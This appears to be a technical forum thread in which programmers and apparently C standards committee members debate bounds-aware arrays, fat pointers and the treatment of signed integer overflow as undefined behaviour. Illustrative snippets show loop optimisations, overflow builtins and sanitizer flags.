If you want your arrays type-safe you'll need dark macro magic (actually possible in the latest standards I think) or proper templates/generics.

If you really want to make your arrays convenient to use you'll want destructors and RAII.

Then you'd like to be able to conveniently search, sort and filter those arrays. That's clunky without lambdas.

And once you get all that, why not move semantics and...

Conversely if you don't want any of this what's wrong with:

    struct my_array {
        my_type_t *buf;
        size_t len;
    };
I don't think it's worth wasting time standardizing that, especially since I'd probably hardly ever use that since it doesn't really offer any obvious benefits and "size_t" is massively overkill in many situations.


> But if you want better arrays you want operator overload to be able to use these arrays as 1st class citizens without having to use array_get(arr, 3), array_len(arr), array_concatenate(arr1, arr2) etc... You want to be able to write "arr[3]", "arr.len()", "arr1 += arr2" etc...

I don't think that's true at all.

1. "arr[3]" syntax can just be part of the language.

2. For length, we already have the "sizeof()" syntax, although admittedly it is a compile-time construct and expanding it to runtime could be confusing. I am ok with using a standard pseudo-function for array-len and would absolutely prefer it to syntax treating first-class arrays as virtual structs with virtual 'len' members.

3. I don't think any C practitioner wants "arr1 += arr2" style magic.

So I don't buy that there is a need for operator overload; the rest of your claims that this is basically an ask for C++ follow baselessly from that premise.


> Conversely if you don't want any of this what's wrong with:

As I suggested, adding a(n optional) constraint such that "buf" can be limited by "len" in such a struct is a possible approach to offering safer arrays. Such a change seems like it kinda requires a change to the language.


Apparently not everyone, otherwise it would be part of ISO C already, and it hasn't been for lack of trying.


Not literally everyone, I would think, but the previous statement could, in theory, still be true. It would just require some people to want something else, conflicting with that desire, even more.

I know, this is pedantic, I suppose. Mea culpa.


> every single item in C++ was wanted and championed by someone

This is irrelevant to the point I made in the text you quoted.

> Well, C did turn into C++. The entity that gave forth C++ is C.

My mother didn't turn into me. She just gave rise to me. She's still alive and well.

My point, which seems to have completely escaped you, is that C itself should not turn into C++, so claims that any attempt at all ever to improve C with the addition of a single constraint mechanism for managing pointer size safely is a slippery slope to duplicating what C++ has become, leaving no non-C++ C language in its wake -- well, such claims seem unlikely to be an unavoidable Truth.

> A good way to have a C++ with fewer features would be to trim from C++ rather than add to C.

Again, my point is not easily crammed into the round hole of your idea of how things worked. It is, instead, that C can have a few more safety features without becoming "C++ with fewer features".

I feel like you didn't read my previous message as a whole at all given the way you responded to it, and just looked for trigger words you could use to push some kind of preconceived notions.


That should have said "many contend". Now it seems too late to edit.


> if you want a dialect of C with arrays that know their length, you can use C++

C++ doesn't have arrays which know their length.


What's std::array then?

> combines the performance and accessibility of a C-style array with the benefits of a standard container, such as knowing its own size

https://en.cppreference.com/w/cpp/container/array


They're objects that mostly behave like arrays. You can't index element two of std::array foo as 1[foo] since it isn't an actual C array.


A Pascal array is just ones and zeros that behave like an array. So is a Fortran array.

> You can't index element two of std::array foo as 1[foo] since it isn't an actual C array.

That's just a silly quirk of C syntax that is deliberately not modeled in C++ operator overloading. It's not a real capability; it doesn't make arrays "do" anything new, so it's hard to call it an array behavior. It's a compiler behavior, that's for sure.

It could easily be added to C++, similarly to the way preincrement and postincrement are represented (which allows obj++ and ++obj to be separate overloads).

   T &array_class::operator [] (int index) {
      // handles array[42]
   }

   T &array_class::operator [] (int index, int) {  // Fictional!!
      // handles 42[array]
   }
The dummy extra int parameter would mean "this overload of operator [] implements the flipped case, when the object is between the [ ] and the index is on the left".

C++ could easily have this; the technical barrier is almost nonexistent. (I wonder what the minimal diff against GNU C++ would be to get it going.)

I suspect that it's explicitly unwanted.


Ok, but who actually uses that?


The point is to demonstrate that std::array isn't an array.


What makes you so sure that if C got better arrays, those would be arrays, supporting a[i] i[a] commutativity and all?

That is predicated on equivalence to *(a + i) where a is a dumb pointer whose displacement commutes.


That is a quirk of C's arrays; no other language besides Assembly allows for that.

And even in Assembly, it depends on the CPU flavor which kind of memory accesses are available.


It depends entirely on the whims of the assembly language design. Assembly languages for the Motorola 68000 could allow operand syntax like [A0 + offset], which could commute with [offset + A0], but the predominant syntax for that CPU family has it as offset(A0), which cannot be written A0(offset).

None of that changes what instruction is generated, just like C's quirk is one of pure syntax that doesn't affect the run-time.


Ok, fair. But for almost all practical purposes, std::array is an appropriate array replacement.


C++ has features in its syntax so that you can write objects that behave like arrays: they support [] indexing via operator [], and can be passed around (according to whatever ownership discipline you want: duplication, reference counting). C++ provides such objects in its standard library, such as std::basic_string<T> and std::vector<T>. There is a newer std::array also.


And depending on the compiler they can also bounds check, even in release builds, it is a matter of enabling the right build configuration flags.


Fat pointers in C would involve an ABI break for existing code, in that uintptr_t and uintmax_t would probably need to double in size.


It would presumably involve a new type that didn't exist in the current ABI. Those pointers would stay the same, and the new (twice as big) pointers would be used for the array feature.


On a given platform, the fat pointer type could have an easily defined ABI expressible in C90 declarations (whose ABI is then deducible accordingly).

For instance, complex double numbers can have an ABI which says that they look like struct { double re, im; };


The point of uintptr_t is that it's an integer type to which any pointer type can be cast. If you introduce a new class of pointers which are not compatible with uintptr_t, then suddenly you have pointers which are not pointers.


No, uintptr_t is an integer type to which any object pointer type can be converted without loss of information. (Strictly speaking, the guarantee is for conversion to and from void*.) And if an implementation doesn't have a sufficiently wide integer type, it won't define uintptr_t. (Likewise for intptr_t the signed equivalent.)

There's no guarantee that a function pointer type can be converted to uintptr_t without loss of information.

C currently has two kinds of pointer types: object pointer types and function pointer types. "Fat pointers" could be a third. And since a fat pointer would internally be similar to a structure, converting it to or from an integer doesn't make a whole lot of sense. (If you want to examine the representation, you can use memcpy to copy it to an array of unsigned char.)


Note that POSIX requires that object pointers and function pointers are the same for dlsym.


Surely you're not arguing that a bounded array is in fact a function rather than an object? The distinction between function and object pointers exists for Harvard architecture computers, which sort of exist (old Atmel AVR before they adopted ARM), but are not dominant.


You would be shocked by this language called C++ which is highly compatible with C and has "pointer to member" types that don't fit into a uintptr_t.

(Spoiler: no, there is no uintptr2_t).


Ditto uintmax_t. We do not want a uintmax2_t.


Existing code would be using normal pointers, not fat pointers, so there would be no ABI break. New code using fat pointers would know that they fit into a pair of uintptr_t, so the size of uintptr_t would not need to change either.


I don't think we want a uintptr_t and uintptr2_t.


IDK, it's not like it'd be an auto_ptr situation where you just don't use uintptr_t anymore and call the other one uintptr2_t. There's different enough semantics that they both still make sense.

Like, as someone who does real, real dirty stuff in Rust, usize as a uintptr equivalent gets used still even though fat pointers are about as well supported as you can imagine.


Or... deprecating unsafe or not-well-designed (but this is a bit subjective) ideas. Like... deprecating locales. (For why locales aren't well-designed ideas: https://github.com/mpv-player/mpv/commit/1e70e82baa9193f6f02...)


I agree, which is what got me looking at Zig. A future version of C might disallow macros and the preprocessor, disallow circular libraries, and include a module system, while still allowing imports of legacy libs the way Zig does. Also something like LLVM, so we can automatically do static analysis and transforms, would be great.


I am back to learning Zig for the way it addresses some pitfalls in C, but really because it is so easy for cross-platform work. Compiling a program to a Windows exe on my 2011 iMac Pro and then running it on my Windows machine was so easy and the error messages are so helpful when they do occur.

I am not an expert at either C or Zig, so I would appreciate any feedback from anyone who can more intelligently compare the two.


The difference between "Undefined Behavior", as the term is used in the Standard, and "Implementation-Defined Behavior" is that implementations are required to document at least some kind of guarantee about the behavior of the latter, even in cases where guaranteeing anything about the behavior would be expensive and nothing that could be guaranteed would be useful.

What is needed is a category of actions (which I would call "conditionally-defined") where implementations would be required to indicate via "machine-readable" means [e.g. predefined macros, compiler intrinsics, etc.] all possible consequences (one of which could be UB), from which the implementation might choose in Unspecified fashion. If an implementation reports that it may process signed arithmetic using temporary values that may, at the compiler's leisure, be of an unspecified size larger than specified, but that signed overflow will have no effect other than to yield values that may be larger than their type would normally be capable of holding, then the implementation would be required to behave in that fashion if integer overflow occurs.

In general, the most efficient code meeting application requirements could be generated by demanding semantics which are as loose as possible without increasing the amount of user code required to meet those requirements. Because different implementations are used for different purposes, no single set of behavioral guarantees would be optimal for all purposes. If compilers are allowed to reject code that demands guarantees an implementation doesn't support, then the choice of which guarantees to support could safely be treated as a Quality of Implementation issue, but honoring the guarantees an implementation claims to support would be a conformance issue.


> - Some kind of module system, that allows code to be imported with the possibility of name collisions.

That doesn't particularly need modules -- just some form of

     namespace foo {
     }


You can very easily make a struct consisting of a pointer and length, is adding such a thing to the standard really a big deal? Personally, I don't see a problem with passing two arguments.


- In your example there's no guarantee that the length will be accurate, or that the data hasn't been modified independently elsewhere in the program.

- In other words you've created a fantastic shoe-gun. One update line missed (either length or data, or data re-used outside the struct) and your "simple" struct is a huge headache, including potential security vulnerabilities.

- Re-implementing a common error prone thing is exactly what language improvements should target.


I mean, this is C so "fantastic shoe-gun" is part of the territory. But in C you can wrap this vector struct in an abstract data type to try to prevent callers from breaking invariants.


>In your example there's no guarantee that the length will be accurate, or that the data hasn't been modified independently elsewhere in the program.

And having a special data-and-length type would make these guarantees... how? You're ultimately going to need to be able to create these objects from bare data and length somehow, so it's a case of garbage-in-garbage-out.


Declaring it with a custom struct:

    int raw_arr[4] = {0,0,0,0};
    struct SmartArray arr;
    arr.length = 4;
    arr.val = raw_arr;
    some_function(arr);
Smart declaration with custom type: (assume that they'll come up with a good syntax)

    smart_int_arr arr[4] = {0,0,0,0};
    some_function(arr);

With the custom struct, it requires the number `4` to be typed twice manually, while in the second it only needs a single input.


You actually never need to specify the size explicitly in C.

Here are some other ways to declare your struct without needing as much boilerplate per declaration.

    #define MAKE_SMARTARRAY(_smartarr, _array) \
            do {\
                (_smartarr).val = (_array);\
                (_smartarr).len = sizeof(_array)/sizeof((_array)[0]);\
            }while(0)
    
    struct SmartArray
    {
        int *val;
        int len;
    };
    
    int main()
    {
        int array[] = {0,0,0,0};
        
        struct SmartArray arr = {.val = array, 
                                    .len = sizeof(array)/sizeof(array[0])};
        struct SmartArray arr2;
        struct SmartArray arr3;
        
        MAKE_SMARTARRAY(arr2, ((int[]){5,6,7,8}));
        MAKE_SMARTARRAY(arr3, array);
    
        return 0;
    }


How about having an attribute which, if applied to a structure that contains a `T*` and an integer type, would allow a `T[]` to be implicitly converted to that structure type?


In Delphi/FreePascal there are dynamic arrays (strings included) that are in fact fat pointers that hide inside more info than just length. All opaque types and work just fine with automatic lifecycle control and COW and whatnot.


What does clean up c mean?


Now that C2x plans to make two's complement the only sign representation, is there any reason why signed overflow has to continue being undefined behavior?

On a slightly more personal note: What are some undefined behaviors that you would like to turn into defined behavior, but can't change for whatever reasons that be?


Signed overflow being undefined behavior allows optimizations that wouldn't otherwise be possible.

Quoting http://blog.llvm.org/2011/05/what-every-c-programmer-should-...

> This behavior enables certain classes of optimizations that are important for some code. For example, knowing that INT_MAX+1 is undefined allows optimizing "X+1 > X" to "true". Knowing the multiplication "cannot" overflow (because doing so would be undefined) allows optimizing "X*2/2" to "X". While these may seem trivial, these sorts of things are commonly exposed by inlining and macro expansion. A more important optimization that this allows is for "<=" loops like this:

> for (i = 0; i <= N; ++i) { ... }

> In this loop, the compiler can assume that the loop will iterate exactly N+1 times if "i" is undefined on overflow, which allows a broad range of loop optimizations to kick in. On the other hand, if the variable is defined to wrap around on overflow, then the compiler must assume that the loop is possibly infinite (which happens if N is INT_MAX) - which then disables these important loop optimizations. This particularly affects 64-bit platforms since so much code uses "int" as induction variables.


I've always thought that assuming such things should be wrong, because if you were writing the asm manually, you would certainly think about it and NOT optimise unless you had a very good reason why it won't overflow. Likewise, unless the compiler can prove it won't overflow, it should, like a sane human, refrain from making the assumption.


Well, by that reasoning, if you were coding in C, you would certainly think about it and ensure overflows won't happen.

The fact is that if the compiler encounters undefined behaviour, it can do basically whatever it wants and it will still be standard-compliant.


> for (i = 0; i <= N; ++i) { ... }

The worst thing is that people take it as acceptable that this loop is going to operate differently upon overflow (e.g. assume N is TYPE_MAX) depending on whether i or N are signed vs. unsigned.


Is this a real concern, beyond 'experts panel' esoteric discussion? Do folks really put a number into an int that is sometimes going to need to be exactly TYPE_MAX but no larger?

I've gone a lifetime programming, and this kind of stuff never, ever matters one iota.


Yes, people really do care about overflow. Because it gets used in security checks, and if they don't understand the behavior then their security checks don't do what they expected.

https://gcc.gnu.org/bugzilla/show_bug.cgi?id=30475 shows someone going hyperbolic over the issue. The technical arguments favor the GCC maintainers. However I prefer the position of the person going hyperbolic.


That example was not 'overflow'; it was 'off by one'? That seems uninteresting, outside, as you say, the security issue where somebody might take advantage of it.


That example absolutely was overflow. The bug is, "assert(int+100 > int) optimized away".

GCC has the behavior that overflowing a signed integer gives you a negative one. But an if statement that TESTS for that is optimized away!

The reason is that overflow is undefined behavior, and therefore they are within their rights to do anything that they want. So they actually overflow in the fastest way possible, and optimize code on the assumption that overflow can't happen.

The fact that almost no programmers have a mental model of the language that reconciles these two facts is an excellent reason to say that very few programmers should write in C. Because the compiler really is out to get you.


Sure. Sorry, I was ambiguous. The earlier example of ++i in a loop I was thinking of. Anyway, yes, overflow for small ints is a real thing.


The very few times I've ever put in a check like that, I always do something like i < INT_MAX - 5 just to be sure, because I'm never confident that I intuitively understand off-by-one errors.


Same here. But I instead run a loop over a range around INT_MAX (or wherever the issue is) and print the result, so I know I'm doing what I think I'm doing. Exhaustive testing is quick, with a computer!


This isn't a good idea either: if you're dealing with undefined behavior, the way the compiler translates your code can change from version to version, so you could end up with code that works with the current version of GCC but doesn't work on the next. Personally I don't agree with the way GCC and other compilers deal with UB, but that would be off topic.


Hm. May be off-topic by now. Incrementing an int is going to work the same on the same hardware, forever. Nothing the compiler has any say in.


If a compiler decides that it's going to process:

    unsigned mul(unsigned short x, unsigned short y)
    { return x*y; }
in a way that causes calling code to behave in meaningless fashion if x would exceed INT_MAX/y [something gcc will sometimes actually do, by the way, with that exact function!], the hardware isn't going to have any say in that.


So in a corner case where you have a loop that iterates over all integer values (when does this ever happen?) you can optimize your loop. As a consequence, signed integer arithmetic is very difficult to write while avoiding UB, even for skilled practitioners. Do you think that's a useful trade-off, and do you think anything can be done for those of us who think it's not?


No, it's exactly the opposite. Without UB the compiler must assume that the corner case may arise at any time. Knowing it is UB we can assert `n+1 > n`, which without UB would be true for all `n` except INT_MAX. Standardising wrap-on-overflow would mean you can now handle that corner case safely, at the cost of missed optimisations on everything else.


I/we understand the optimization, and I'm sure you understand the problem it brings to common procedures such as DSP routines that multiply signed coefficients from e.g. video or audio bitstreams:

for (int i = 0; i < 64; i++) result[i] = inputA[i] * inputB[i];

If inputA[i] * inputB[i] overflowed, why are my credit card details at risk? The question is: can we come up with an alternate behaviour that incorporates both advantages of the i<=N optimization, as well as leave my credit card details safe if the multiplication in the inner loop overflowed? Is there a middle road?


Another problem is that there's no way to define it, because in that example the "proper" way to overflow is with saturating arithmetic, and in other cases the "proper" overflow is to wrap. Even on CPUs/DSPs that support saturating integer arithmetic in hardware, you either need to use vendor intrinsics or control the status registers yourself.


One could allow the overflow behavior to be specified, for example on the scope level. Idk, with a #pragma ? #pragma integer-overflow-saturate


I'd almost rather have a separate "ubsigned" type which has undefined behavior on overflow. By default, integers behave predictably. When people really need that extra 1% performance boost, they can use ubsigned just in the cases where it matters.


I don't know if I agree. Overflow is like uninitialized memory, it's a bug almost 100% of the time, and cases where it is tolerated or intended to occur are the exception.

I'd rather have a special type with defined behavior. That's actually what a lot of shops do anyways, and there are some niche compilers that support types with defined overflow (ADI's fractional types on their Blackfin tool chain, for example). It's just annoying to do in C, this is one of those cases where operator overloading in C++ is really beneficial.


> I don't know if I agree. Overflow is like uninitialized memory, it's a bug almost 100% of the time, and cases where it is tolerated or intended to occur are the exception.

Right, but I think the problem is that UB means literally anything can happen and be conformant to the spec. If you do an integer overflow, and as a result the program formats your hard drive, then it is acting within the C spec.

Now compiler writers don't usually format your hard drive when you trigger UB, but they often do things like remove input sanitation or other sorts of safety checks. It's one thing if as a result of overflow, the number in your variable isn't what you thought it was going to be. It's completely different if suddenly safety checks get tossed out the window.

When you handle unsanitized input in C on a security boundary, you must literally treat the compiler as a "lawful evil" accomplice to the attackers: you must assume that the compiler will follow the spec to the letter, but will look for any excuse to open up a gaping security hole. It's incredibly stressful if you know that fact, and incredibly dangerous if you don't.


> When you handle unsanitized input in C on a security boundary, you must literally treat the compiler as a "lawful evil" accomplice to the attackers: you must assume that the compiler will follow the spec to the letter, but will look for any excuse to open up a gaping security hole. It's incredibly stressful if you know that fact, and incredibly dangerous if you don't.

I'd say more chaotic evil, since the Standard has many goofy and unworkable corner cases, and no compiler tries to handle them all except, sometimes, by needlessly curtailing optimizations. Consider, for example:

    int x[2];
    int test(int *restrict a, int *b)
    {
      *a = 1;
      int *p = x+(a!=b);
      *p = 2;
      return *a;
    }
The way the Standard defines "based upon", if a and b are both equal to x, then p would be based upon a (since replacing a with a pointer to a copy of x would change the value of p). Some compilers that ignore "restrict" might generate code that accommodates the possibility that a and b might both equal x, but I doubt there are any that would generally try to optimize based on the restrict qualifier, but would hold off in this case.


Integer overflow is more than a 1% performance boost, as it lets you do a lot of things with loops.


I once did a stupid test using either an int or an unsigned as the for-loop variable; the performance hit was about 1%. Problem is, modern processors can walk, chew gum, and juggle all at the same time, which tends to negate a lot of simplistic optimizations.

Compiler writers tend to assume the processor is a dumb machine. But modern ones aren't: they do a lot of resource allocation and optimization on the fly, and they do it in hardware in real time.


> modern processors can walk, chew gum, and juggle all at the same time

It's easier than it sounds. One of the major problems you usually run into when learning to juggle is that you throw the balls too far forward (their arc should be basically parallel to your shoulders, but it's easy to accidentally give them some forward momentum too), which pulls you forward to catch them. Being allowed to walk means that's OK.

(For the curious, there are three major problems you're likely to have when first learning to juggle:

1. I can throw the balls, but instead of catching them, I let them fall on the ground.

2. My balls keep colliding with one another in midair.

3. I keep throwing the balls too far forward.)

There's actually a niche hobby called "joggling" which, as the name implies, involves juggling while jogging.


> Compiler writers tend to assume the processor is a dumb machine.

A lot of C developers tend to assume the compiler is a dumb program ;) There are significant hoisting and vectorization optimizations that signed overflow can unlock, but they can't always be applied.


If C had real array types the compiler could do real optimizations instead of petty useless ones based on UB.


Fair, hence the push in many languages for range-based for loops that can optimize much better.


Have you considered adding intrinsic functions for arithmetic operations that _do_ have defined behavior on overflow. Such as the overflowing_* functions in rust?


The semantics most programs need for overflow are to ensure that (1) overflow does not have intolerable side effects beyond yielding a likely-meaningless value, and (2) some programs may need to know whether an overflow might have produced an observably-arithmetically-incorrect result. A smart compiler for a well-designed language should in many cases be able to meet these requirements much more efficiently than it could rigidly process the aforementioned intrinsics.

A couple of easy optimizations, for example, that would be available to a smart compiler processing straightforwardly-written code to use automatic overflow checking, but not to one fed code that uses intrinsics:

1. If code computes x=y*z, but then never uses the value of x, a compiler that notices that x is unused could infer that the computation could never be observed to produce an arithmetically-incorrect result, and thus there would be no need to check for overflow.

2. If code computes x*y/z, and a compiler knows that y=z*2, the compiler could simplify the calculation to x+x, and would thus merely have to check for overflow in that addition. If code used intrinsics, the compiler would have to overflow-check the multiplication, which on most platforms would be more expensive. If an implementation uses wrapping semantics, the cost would be even worse, since the implementation would have to perform an actual division to ensure "correct" behavior in the overflow case.

Having a language offer options for the aforementioned style of loose overflow checking would open up many avenues of optimization which are unavailable in languages that offer only precise overflow checking or no overflow checking whatsoever.


oops, i meant the wrapping_* functions


If one wants a function that will compute x*y/z when x*y doesn't overflow, and yield some arbitrary value (but without other side effects) when it does, wrapping functions will often be much slower than code that doesn't have to guarantee any particular value in case of overflow. If e.g. y is known to be 30 and z equal to 15, code using a wrapping multiply would need to multiply the value by 30, truncate the result, and divide that by 15. If the program could use loosely-defined multiplication and division operators, however, the expression could be simplified to x+x.


I hadn’t understood the utility of undefined behaviour until reading this, thank you.


N is a variable. It might be INT_MAX so the compiler cannot optimise the loop for any value of N. Unless you make this UB.


No, the optimizations referred to include those that will make the program faster when N=100.


Just going to inject that this impacts a bunch of random optimizations and benchmarks. Just to fabricate an example:

    for (int i = 0; i < N; i += 2) {
        //
    }
Reasonably common idea but the compiler is allowed to assume the loop terminates precisely because signed overflow is undefined.

I’m not trying to argue that signed overflow is the right tool for the job here for expressing ideas like “this loop will terminate”, but making signed overflow defined behavior will impact the performance of numerics libraries that are currently written in C.

From my personal experience, having numbers wrap around is not necessarily “better” than having the behavior undefined, and I’ve had to chase down all sorts of bugs with wraparound in the past. What I’d personally like is four different ways to use integers: wrap on overflow, undefined overflow, error on overflow, and saturating arithmetic. They all have their places and it’s unfortunate that it’s not really explicit which one you are using at a given site.


Under C11, the compiler is still allowed to assume termination of a loop if the controlling expression is non-constant and a few other conditions are met.

https://stackoverflow.com/a/16436479/530160


The compiler assumes that the loop will always terminate, and that assumption is wrong, because in reality there is the possibility that the loop will not terminate, since the hardware WILL overflow.

So it's not the best solution. If we want this behaviour for the sake of optimizations (which to me are not worth it, given the risk of potentially critical bugs), we must make it explicit, not implicit: it is the programmer who has to say to the compiler, "I guarantee you that this operation will never overflow; if it does, it's my fault."

We can agree that having a number that wraps around is not a particularly good choice. But unless we convince Intel in some way that this is bad and make the CPU trap on overflow, so we can catch that bug, this is the behaviour that we have, because it is the behaviour of the hardware.


> The compiler assumes that the loop will alwasy terminate and that assumption is wrong, because in reality there is the possibility that the loop will not terminate, since the hardware WILL overflow.

The language is not a model of hardware, nor should it be. If you want to write to the hardware, the only option continues to be assembly.


> I guarantee you that this operation will never overflow, if it does it's my fault.

This is exactly what every C programmer does, all the time.


> the compiler is allowed to assume the loop terminates precisely because signed overflow is undefined.

Just to be sure I understand the fine details of this -- what would the impact be if the compiler assumed (correctly) that the loop might not terminate? What optimization would that prevent?


If the compiler knows that the loop will terminate in 'x' iterations, it can do things like hoist some arithmetic out of the loop. The simplest example would be if the code inside the loop contained a line like 'counter++'. Instead of executing 'x' ADD instructions, the binary can just do one 'counter += x' add at the end.


What I’m driving at is, if the loop really doesn’t terminate, it would still be safe to do that optimization because the incorrectly-optimized code would never be executed.

I guess that doesn’t necessarily help in the “+=2” case, where you probably want the optimizer to do a “result += x/2”.

In general, I’d greatly prefer to work with a compiler that detected the potential infinite loop and flagged it as an error.


> …what would the impact be if the compiler assumed (correctly) that the loop might not terminate?

Loaded question—the compiler is absolutely correct here. There are two viewpoints where the compiler is correct. First, from the C standard perspective, the compiler implements the standard correctly. Second, if we have a real human look at this code and interpret the programmer’s “intent”, it is most reasonable to assume that overflow does not happen (or is not intentional).

The only case which fails is where N = INT_MAX. No other case invokes undefined behavior.

Here is an example you can compile for yourself to see the different optimizations which occur:

    typedef int length;
    int sum_diff(int *arr, length n) {
        int sum = 0;
        for (length i = 0; i < n; i++) {
            sum += arr[2*i+1] - arr[2*i];
        }
        return sum;
    }
At -O2, GCC 9.2 (the compiler I happened to use for testing) will use pointer arithmetic, compiling it as something like the following:

    int sum_diff(int *arr, length n) {
        int sum = 0;
        int *ptr = arr;
        int *end = arr + n;
        while (ptr < end) {
            sum += ptr[1] - ptr[0];
            ptr += 2;
        }
        return sum;
    }
At -O3, GCC 9.2 will emit SSE instructions. You can see this yourself with Godbolt.

Now, try replacing "int" with "unsigned". Neither of these optimizations happen any more. You get neither autovectorization nor pointer arithmetic. You get the original loop, compiled in the most dumb way possible.

I wouldn’t read into the exact example here too closely. It is true that you can often figure out a way to get the optimizations back and still use unsigned types. However, it is a bit easier if you work with signed types in the first place.

Speaking as someone who does some numerics work in C, there is something of a “black art” to getting good numerics performance. One easy trick is to switch to Fortran. No joke! Fortran is actually really good at this stuff. If you are going to stick with C, you want to figure out how to communicate to the compiler some facts about your program that are obvious to you, but not obvious to the compiler. This requires a combination of understanding the compiler builtins (like __builtin_assume_aligned, or __builtin_unreachable), knowledge of aliasing (like use of the "restrict" keyword), and knowledge of undefined behavior.

If you need good performance out of some tight inner loop, the easiest way to get there is to communicate to the compiler the “obvious” facts about the state of your program and check to see if the compiler did the right thing. If the compiler did the right thing, then you’re done, and you don’t need to use vector intrinsics, rewrite your code in a less readable way, or switch to assembly.

(Sometimes the compiler can’t do the right thing, so go ahead and use intrinsics or write assembly. But the compiler is pretty good and you can get it to do the right thing most of the time.)


Thanks for the code, this is exactly the kind of concrete example I was looking for!

You're correct about how it behaves with "int" and "unsigned", very interesting. But it occurs to me that on x64 we'd probably want to use 64-bit values. If I change your typedef to either "long" or "unsigned long" that seems to give me the SSE version of the code! (in x86-64 gcc 9.3) Why should longs behave so differently from ints?

I very much agree that getting good numerics performance out of the optimizer seems to be a black art. But does the design of C really help here, or are there ways it could help more? Does changing types from signed to unsigned, or int to long, really convey your intentions as clearly as possible?

I remain skeptical that undefined behaviour is a good "hook" for compilers to use to judge programmer intention, in order to balance the risks and rewards of optimizations. (Admittedly I'm not in HPC where this stuff is presumably of utmost importance!) It all seems dangerously fragile.

If you need good performance out of some tight inner loop, the easiest way to get there is to communicate to the compiler the “obvious” facts about the state of your program and check to see if the compiler did the right thing. If the compiler did the right thing, then you’re done, and you don’t need to use vector intrinsics, rewrite your code in a less readable way, or switch to assembly.

I strongly agree with the first part of this -- communicating your intent to the compiler is key.

It's the second part that seems really risky. Just because your compiler did the right thing this time doesn't mean it will continue to do so in future, or on a different architecture, and of course who knows what a different compiler might do? And if you end up with the "wrong thing", that may not just mean slow code, but incorrect code.


> But does the design of C really help here, or are there ways it could help more?

I’m sure there are ways that it could help more. But you have to find an improvement that is also feasible as an incremental change to the language. Given the colossal inertia of the C standard, and the zillions of lines of existing C code that must continue to run, what can you do?

What I don’t want to see are tiny, incremental changes that make one small corner of your code base slightly safer. Most people don’t want to see performance regressions across their code base. That doesn’t leave a lot of room for innovation.

> It all seems dangerously fragile.

If performance is critical you run benchmarks on CI to detect regression.

> It's the second part that seems really risky.

It is safer than the alternatives, unless you write it in a different language. The “fast” code here is idiomatic, simple C the way you would write it in CS101, with maybe a couple builtins added. The alternative is intrinsics, which poses additional difficulty. Intrinsics are less portable and less safe. Less safe because their semantics are often unusual or surprising, and also less safe because code written with intrinsics is hard to read and understand (so if it has errors, they are hard to find). If you are not using intrinsics or the autovectorizer, then sorry, you are not getting vector C code today.

This is also not, strictly speaking, just an HPC concern. Ordinary phones, laptops, and workstations have processors with SIMD for good reason—because they make an impact on the real-life usability of ordinary people doing ordinary tasks on their devices.

So if we can get SIMD code by writing simple, idiomatic, and “obviously correct” C code, then let’s take advantage of that.


I can certainly understand the value in allowing compilers to perform integer arithmetic using larger types than specified, at their leisure, or behave as though they do. Such allowance permits `x+y > y` to be replaced with `x > 0`, or `x*30/15` to be replaced with `x*2`, etc. and also allows for many sorts of useful loop induction.

Some additional value would be gained by allowing stores to automatic objects whose address isn't taken to maintain such extra range at their convenience, without any requirement to avoid having such extra range randomly appear and disappear. Provided that a program coerces values into range when necessary, such semantics would often be sufficient to meet application requirements without having to prevent overflow.

What additional benefits are achieved by granting compilers unlimited freedom beyond that? I don't see any such benefits that would be worth anything near the extra cost imposed on programmers.


What should be relevant is not programmer "intent", but rather whether the behavior would likely match that of an implementation which gives the parts of the Standard that describe the behavior of actions priority over the parts that would characterize those actions as "Undefined Behavior".


You shouldn't even need compiler builtins, just perform undefined behavior on a branch:

  if ((uintptr_t)ptr & (alignment - 1)) {  /* misaligned (alignment a power of 2) */
      char *p = NULL;
      printf("%c\n", *p);
  }


Some instances of undefined behavior at translation time can effectively be avoided in practice by tightening up requirements on implementations to diagnose them. But strictly speaking, because the standard allows compilers to continue to chug along even after an error and emit object code with arbitrary semantics, turning even such straightforward instances into constraint violations (i.e., diagnosable errors) doesn't prevent UB.

It might seem like defining the semantics for signed overflow would be helpful but it turns out it's not, either from a security view or for efficiency. In general, defining the behavior in cases that commonly harbor bugs is not necessarily a good way to fix them.


Maybe someone else can respond to this as well, but I feel like the primary reason signed overflow is still undefined behavior is because so many optimizations depend upon the undefined nature of signed integer overflow. My advice has always been to use unsigned integer types when possible.

Personally, I would like to get rid of many of the trap representations (e.g., for integers) because there is no existing hardware in many cases that supports them and it gives implementers the idea that uninitialized reads are undefined behavior.

On the other hand, I just wrote a proposal to WG14 to make zero-byte reallocations undefined behavior that was unanimously accepted for C2x.


> My advice has always been to use unsigned integer types when possible.

Unsigned types have their own issues, though: they wrap around at "small" values (0 - 1 becomes UINT_MAX), which means that doing things like correctly looping "backwards" over an array with an unsigned index is non-trivial.
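For example, here is one common idiom (a sketch, with a name I made up) that handles this correctly:

```c
#include <stddef.h>

/* The naive "for (size_t i = n - 1; i >= 0; i--)" never terminates,
   because i >= 0 is always true for an unsigned type (and n - 1 wraps
   to SIZE_MAX when n is 0). The "test, then decrement" idiom below
   visits indices n-1 down to 0 and stops correctly, including for n == 0. */
long sum_backwards(const int *arr, size_t n) {
    long total = 0;
    for (size_t i = n; i-- > 0; )
        total += arr[i];
    return total;
}
```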

> On the other hand, I just wrote a proposal to WG14 to make zero-byte reallocations undefined behavior that was unanimously accepted for C2x.

You're saying that realloc(foo, 0) will no longer free the pointer?


realloc(foo, 0) was changed to no longer free in C99. A rant on the subject: https://github.com/Tarsnap/libcperciva/commit/cabe5fca76f6c3...


Another approach would be a standard library of arithmetic routines that signal overflow.

If people used them while parsing binary inputs that would prevent a lot of security bugs.

The fact that this question exists and is full of wrong answers suggests a language solution is needed: https://stackoverflow.com/questions/1815367/catch-and-comput...


Take a look at N2466 2020/02/09 Svoboda, Towards Integer Safety which has some support in the committee:

http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2466.pdf

(signal is a strong word... maybe indicate?)


You can enable this in GCC on a compilation unit basis with `-fsanitize=signed-integer-overflow`. In combination with `-fsanitize-undefined-trap-on-error`, the checks are quite cheap (on x86, usually just a `jo` to a `ud2` instruction).

(Note that while `-ftrapv` would seem equivalent, I've found it to be less reliable, particularly with compile-time checking.)


And clang!


Microsoft in particular has a simple approach to this with things like DWordMult().

    if (FAILED(DWordMult(a, b, &product)))
    {
       // handle error
    }


Clang and GCC's approach for these operations is even nicer FWIW (__builtin_[add/sub/mul]_overflow(a, b, &c)), which allow arbitrary heterogenous integer types for a, b, and c and do the right thing.

I know there's recently been some movement towards standardizing something in this direction, but I don't know what the status of that work is. Probably one of the folks doing the AUA can update.
